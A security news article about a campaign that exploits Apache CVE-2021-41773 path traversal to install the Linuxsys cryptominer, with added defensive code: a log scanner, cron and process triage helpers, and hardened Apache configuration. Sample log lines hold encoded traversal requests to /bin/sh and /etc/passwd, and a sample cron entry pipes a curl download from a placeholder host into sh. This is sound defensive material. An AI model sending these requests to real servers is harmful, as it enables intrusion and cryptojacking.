Researchers have uncovered a spreading campaign that exploits a known Apache HTTP Server vulnerability (CVE-2021-41773) to deploy a Linux-based cryptocurrency miner called Linuxsys. The path-traversal flaw, which affects Apache 2.4.49, lets unauthenticated attackers read files outside the document root and, where mod_cgi is enabled, execute arbitrary commands on the web server. In recent weeks, compromised websites have been silently delivering the mining scripts through curl or wget downloads from compromised third-party infrastructure. The activity originates mainly from a single Indonesian IP address and points to a coordinated campaign that relies on stealthy distribution channels to monetize compromised hosts.
The vulnerability at the heart of this campaign is CVE-2021-41773, a well-documented path traversal flaw in Apache HTTP Server version 2.4.49. Although the flaw was disclosed and patched in October 2021, threat actors are still targeting unpatched systems today, exploiting servers that were overlooked or left behind in larger infrastructure deployments.
Here is how the attack works in practice. The attacker sends a request whose path contains traversal segments in which one of the dots is URL-encoded (.%2e/ or %2e%2e/ rather than a literal ../), which the path normalizer in 2.4.49 failed to reject. The traversal escapes the document root and reads files the server process can access, such as /etc/passwd. On servers that also have the mod_cgi module enabled, the same traversal can be pointed at /bin/sh under the /cgi-bin/ alias, and the body of a POST request is then executed as shell commands. Both outcomes depend on the filesystem outside the document root not being protected by the default Require all denied rule, which is why deployments that loosened that setting are the ones being hit. If successful, the attacker gets command execution without ever authenticating.
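The request pattern described above is easy to spot in access logs after the fact. The following Python scanner is an added example (it is not code from the article or from the researchers it cites): it parses Apache combined-format log lines, percent-decodes each request target twice, and flags traversal segments, shell targets under /cgi-bin/, and sensitive file reads. The log lines, IP addresses and timestamps are constructed for the example. The double-encoded form (%%32%65) is included because the first fix in Apache 2.4.50 was incomplete and was bypassed that way (CVE-2021-42013); both issues are fixed in 2.4.51.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" format (not taken from the article).
SAMPLE_LOG = """\
203.0.113.7 - - [17/Jul/2025:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.9 - - [17/Jul/2025:10:01:15 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 71 "-" "curl/7.68.0"
198.51.100.9 - - [17/Jul/2025:10:01:16 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1463 "-" "curl/7.68.0"
198.51.100.9 - - [17/Jul/2025:10:01:20 +0000] "GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 200 71 "-" "curl/7.68.0"
203.0.113.7 - - [17/Jul/2025:10:02:00 +0000] "GET /docs/../images/logo.png HTTP/1.1" 200 532 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Percent-encoded dots are the fingerprint: 2.4.49 rejected a literal "../"
# segment but let ".%2e/" or "%2e%2e/" through (CVE-2021-41773); the 2.4.50
# fix was bypassed with a second encoding layer, "%%32%65" -> "%2e" -> "."
# (CVE-2021-42013). Both are fixed in 2.4.51.
ENCODED_DOT_RE = re.compile(r'%2e|%%32%65', re.IGNORECASE)


def decode_target(target: str) -> str:
    """Strip the query string and percent-decode twice, mirroring the double-decoding bypass."""
    path = target.split('?', 1)[0]
    return unquote(unquote(path))


def classify_target(target: str) -> list[str]:
    """Return the reasons a request target looks like this exploit chain (empty if benign)."""
    decoded = decode_target(target)
    reasons: list[str] = []
    if '..' not in decoded.split('/'):
        return reasons                      # no traversal segment after decoding
    if ENCODED_DOT_RE.search(target):
        reasons.append('encoded-dot traversal (CVE-2021-41773/42013 pattern)')
    else:
        reasons.append('plain traversal segment')
    if decoded.startswith('/cgi-bin/') and re.search(r'/bin/(ba)?sh$', decoded):
        reasons.append('shell reached through mod_cgi (command execution)')
    if re.search(r'/etc/(passwd|shadow)$', decoded):
        reasons.append('sensitive file read')
    return reasons


def scan_access_log(text: str) -> list[dict]:
    """Parse each log line and keep those whose target triggers at least one reason."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_target(m['target'])
        if reasons:
            hits.append({'ip': m['ip'], 'method': m['method'], 'status': m['status'],
                         'target': m['target'], 'reasons': reasons})
    return hits


if __name__ == '__main__':
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['method']} {hit['status']} {hit['target']}")
        for reason in hit['reasons']:
            print(f"    - {reason}")
```

A literal ../ request (the last sample line) is reported at lower severity as a plain traversal: browsers normalize it before sending, so it is unusual but not by itself evidence of this exploit. A 200 status on an encoded-dot request to /bin/sh is the signal to treat the host as compromised.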
In the latest wave of attacks, the attackers use this access to run shell commands that silently download and execute malicious scripts. These scripts typically use curl or wget to fetch additional payloads from remote servers, often hosted on compromised but otherwise legitimate domains such as repositorylinux.org. This keeps the operation quiet, since traditional blocklists and threat intelligence feeds may not flag such delivery sites immediately.
The payload is a Linux-based cryptocurrency miner known as Linuxsys. Once executed, it runs in the background and hijacks CPU time to mine cryptocurrencies such as Monero. The mining process is usually disguised as a system process and configured to consume only a moderate share of resources. This slow-burn approach keeps it hidden for long periods without tripping usage alarms or drawing attention from users or administrators.
To ensure persistence, the malware modifies startup configurations and sometimes plants cron jobs that restart the miner if it is killed or the server is rebooted. It can also use symlinks or deceptive file names to blend in with other system files. Some reports indicate that the malware removes forensic traces, such as deleting bash history or log files, making detection and post-incident analysis more difficult.
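The persistence and anti-forensics tricks above translate directly into a host triage checklist. The helpers below are an added example, not a tool from the article or from any vendor: each reads text on stdin so it can be run against the constructed samples embedded here or against live output (`cat /etc/crontab /etc/cron.d/* | flag_cron_persistence`, `ps -eo pid,pcpu,comm,args | flag_hungry_processes 40`). The crontab and ps samples are constructed; `linuxsys` is the miner name from the article, while `xmrig` is an assumed generic Monero-miner indicator and the `/tmp/.x/` path and `example.invalid` host are placeholders.

```shell
#!/bin/sh
# Added example (not from the article): triage helpers for cron persistence,
# disguised CPU-hungry processes, and tampered shell history.

# Constructed sample crontab text; the last two entries are the kind to flag.
SAMPLE_CRON='# m h dom mon dow user  command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
@reboot root /tmp/.x/linuxsys -c /tmp/.x/config.json >/dev/null 2>&1
*/5 * * * * root curl -s http://example.invalid/miner.sh | sh'

# Constructed "ps -eo pid,pcpu,comm,args" output; pid 1337 hides behind a
# kernel-thread-like name while its arguments give it away.
SAMPLE_PS='  PID %CPU COMMAND         COMMAND
    1  0.0 systemd         /sbin/init
  842  0.3 apache2         /usr/sbin/apache2 -k start
 1337 48.5 kworkerd        /tmp/.x/linuxsys -c /tmp/.x/config.json
 1402  1.2 sshd            sshd: root@pts/0'

# Print cron lines that (re)start something at boot, pipe a download into a
# shell, run from a world-writable scratch directory, or name a known miner.
# "linuxsys" is from the article; "xmrig" is an assumed generic indicator.
flag_cron_persistence() {
    grep -E '@reboot|(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)|/tmp/|/dev/shm/|linuxsys|xmrig'
}

# Print processes whose CPU share exceeds the threshold in $1 (default 40),
# skipping the ps header; a miner throttled to "moderate" usage still shows.
flag_hungry_processes() {
    awk -v limit="${1:-40}" 'NR > 1 && ($2 + 0) > (limit + 0)'
}

# Return 0 if the history file at $1 looks tampered with: symlinked to
# /dev/null, missing, or empty. Any of these is worth a closer look on a
# server whose root account has clearly been used interactively.
history_tampered() {
    f="$1"
    if [ -L "$f" ] && [ "$(readlink "$f")" = "/dev/null" ]; then return 0; fi
    if [ ! -e "$f" ] || [ ! -s "$f" ]; then return 0; fi
    return 1
}

echo "== suspicious cron entries =="
printf '%s\n' "$SAMPLE_CRON" | flag_cron_persistence
echo "== processes above 40% CPU =="
printf '%s\n' "$SAMPLE_PS" | flag_hungry_processes 40
```

Run against a real host, the cron check should also cover user crontabs under /var/spool/cron and systemd units under /etc/systemd/system, and the process listing should be taken with the full argument vector so a renamed binary like the `kworkerd` sample cannot hide behind its comm field.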
Notably, one of the source IP addresses linked to these attacks, 103.193.177[.]152, traced back to Indonesia, has been actively scanning and exploiting vulnerable Apache installations across multiple continents. The campaign's infrastructure is redundant and distributed, so if one payload server is taken down, others quickly pick up the slack. This shows a level of planning and resiliency more often associated with mature threat groups than with opportunistic actors.
From a defensive standpoint, this vulnerability chain is a stark reminder of how easily overlooked misconfigurations or outdated software can be exploited in a highly automated fashion. Attackers are not only using an old CVE; they are chaining it with modern malware distribution methods, giving them a quiet but profitable foothold in compromised environments.
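The misconfiguration that turns this bug into a shell is small. Below is an added example (not configuration from the article or from the Apache project) showing the weak settings beside the hardened ones; the two halves are alternatives, not one file, and the /usr/local/apache2 paths assume the default httpd layout. The configuration only limits the damage; the fix is to run Apache 2.4.51 or later, which `httpd -v` (or `apache2 -v`) will confirm, and `apachectl -M | grep cgi` shows whether mod_cgi is loaded at all.

```apache
# WEAK: the filesystem root is opened up. With this in place, a .%2e/ traversal
# escapes the document root, and once mod_cgi is loaded a request for
# /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh runs the POST body as a shell script.
<Directory />
    AllowOverride None
    Require all granted
</Directory>
LoadModule cgi_module modules/mod_cgi.so
ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/"

# HARDENED: keep the stock deny-all on "/", grant access only to the document
# root and (if needed) the CGI directory, and leave mod_cgi unloaded unless
# something actually depends on it. A traversal out of these directories now
# hits the deny rule instead of /bin/sh or /etc/passwd.
<Directory />
    AllowOverride None
    Require all denied
</Directory>
<Directory "/usr/local/apache2/htdocs">
    Require all granted
</Directory>
<Directory "/usr/local/apache2/cgi-bin">
    Options None
    Require all granted
</Directory>
# LoadModule cgi_module modules/mod_cgi.so    (keep commented out unless CGI is required)
```

After changing the configuration, `apachectl configtest` validates the syntax and a request for `/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd` should return 403 rather than file contents.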
This campaign turns compromised Apache web servers into clandestine crypto-mining machines, consuming CPU cycles and increasing operational costs. Over time, mining degrades performance, leading to slow response times, higher power usage, and possible compliance violations if resource consumption breaches service level agreements. More importantly, the same path traversal used for unauthorized command execution opens the door to far more severe outcomes, such as installation of backdoors, data theft, or ransomware deployment. The campaign represents an ongoing, stealthy threat that prioritizes monetization over immediate disruption.